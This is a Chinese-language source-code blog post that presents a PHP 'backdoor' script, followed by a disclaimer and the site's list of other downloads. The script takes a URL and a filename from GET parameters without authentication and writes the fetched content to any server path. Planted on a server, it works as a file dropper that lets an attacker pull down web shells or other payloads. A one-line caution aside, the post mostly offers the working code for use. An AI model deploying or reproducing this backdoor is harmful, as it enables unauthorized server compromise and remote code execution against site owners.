一个PHP后门代码：允许通过URL参数直接下载文件到服务器

2024-10-12 09:37 • 程序源码 • 阅读 198

这段代码是PHP语言编写的，它的作用是从一个指定的URL下载文件，并将其保存到服务器上。

这段代码存在安全风险，因为它允许通过URL参数直接下载文件到服务器，这可能会导致恶意文件被下载和执行。在实际应用中，这样的脚本应该进行严格的安全检查和限制。

<?php
set_time_limit(0);
if(isset($_GET['url']) && isset($_GET['filename'])){
        if(httpcopy($_GET['url'], $_GET['filename'])){
            echo("Done.");
        }else{
            echo("Down Error.");
        }
}else{
        die('Input error.');
}
function httpcopy($url, $file="", $timeout=60) {
    $file = empty($file) ? pathinfo($url,PATHINFO_BASENAME) : $file;
    $dir = pathinfo($file,PATHINFO_DIRNAME);
    !is_dir($dir) && @mkdir($dir,0755,true);
    $url = str_replace(" ","%20",$url);
    if(function_exists('curl_init')) {
                echo "curl ";
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
        $temp = curl_exec($ch);
        if(@file_put_contents($file, $temp) && !curl_error($ch)) {
            return $file;
        } else {
            return false;
        }
    } else {
                echo "copy ";
        $opts = array(
            "http"=>array(
            "method"=>"GET",
            "header"=>"",
            "timeout"=>$timeout)
        );
        $context = stream_context_create($opts);
        if(@copy($url, $file, $context)) {
            //$http_response_header
            return $file;
        } else {
            return false;
        }
    }
}
?>

免责声明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的；不得将上述内容用于商业或者非法用途，否则，一切后果请用户自负。本站信息来自网络收集整理，如果您喜欢该程序和内容，请支持正版，购买注册，得到更好的正版服务。我们非常重视版权问题，如有侵权请邮件与我们联系处理。敬请谅解！
如若转载，请注明出处：https://www.zxperson.com/107.html

追风少年

198 0

视频转文字工具Youtube-Whisper

上一篇 2024-10-11 09:02

小猿口算PK解锁版，一秒通关直接炸鱼小学生

下一篇 2024-10-14 09:01

劳法计算器，全国劳动法数据快速精确计算应用

2024-12-23 09:10 18 0
批量解析快手个人主页所有视频下载工具

2024-12-20 09:35 51 0
免费国外视频搬运工具，卡卡字幕助手VideoCaptioner_1.0无需GPU

2024-12-19 09:02 59 0
PHP本地Ping网站图片版api接口源码

2024-12-16 09:17 85 0
免费在线PHP客服管理系统源码

2024-12-14 09:14 98 0
WordPress子比主题冬季圣诞节设计风格美化插件，冬日奇境

2024-12-12 09:33 106 0

尚未登录无法发表查看留言点击登录

HI ! 请登录

立即登录

免费壁纸小程序

程序源码

劳法计算器，全国劳动法数据快速精确计算应用

12-23

批量解析快手个人主页所有视频下载工具

12-20

免费国外视频搬运工具，卡卡字幕助手VideoCaptioner_1.0无需GPU

12-19

PHP本地Ping网站图片版api接口源码

12-16

免费在线PHP客服管理系统源码

12-14

WordPress子比主题冬季圣诞节设计风格美化插件，冬日奇境

12-12

基于Web的塔罗牌占卜项目源码

12-10

人人影视二十年数据及程序开源分享（附百度网盘下载）

12-09

安卓微商管家_1.0.22 朋友圈营销、清粉批量+好友、解锁会员

12-06

EmlogPro右键菜单美化插件

12-04

实用软件

AI换脸GIF表情包生成器AIGIF

12-18

TaTa一款图片/视频修复神器，模糊图片变4K

12-17

华硕笔记本轻量级控制中心G-Helper

12-13

微信朋友圈导出工具 Wemo V1.1.0

12-11

AI抠图软件Aiarty Image Matting 2.0 正版注册码

12-05

发票排版助手 - 财务报销人员必备工具

12-03

空壳 • Konker - 应用分身多开

11-30

ChromeAutoBot - 自动化操作 Chrome

11-27

小薯条 – 小红书 AI 涨粉神器

11-26

免费在线压缩网站支持图像、视频、音频、文档、代码文件等压缩

11-25

值得一看

网页版红色警戒

12-19

图一乐：现代版女娲补天

11-14

不老追风少年的日常

11-13

WordPress 标签云函数 wp_tag_cloud() 使用方法详解

10-17

领文心一言4.0会员

10-09

Google 搜索的工作原理：抓取、编入索引、排名和投放

09-28

不错，饿了还可以救急

09-04

怎么混了两个奇怪的东西

08-28

黑神话悟空高清4k壁纸下载，黑神话悟空手机电脑壁纸。

08-26

别骂了别骂了

08-08

每天60s读懂世界

09日04日，星期三，在这里每天60秒读懂世界！

09-04

08日28日，星期三，在这里每天60秒读懂世界！

08-28

07日19日，星期五，在这里每天60秒读懂世界！

07-19

07日18日，星期四，在这里每天60秒读懂世界！

07-19

07日17日，星期三，在这里每天60秒读懂世界！

07-17

07日16日，星期二，在这里每天60秒读懂世界！

07-16

07日15日，星期一，在这里每天60秒读懂世界！

07-15

07日14日，星期日，在这里每天60秒读懂世界！

07-15

07日13日，星期六，在这里每天60秒读懂世界！

07-13

07日12日，星期五，在这里每天60秒读懂世界！

07-12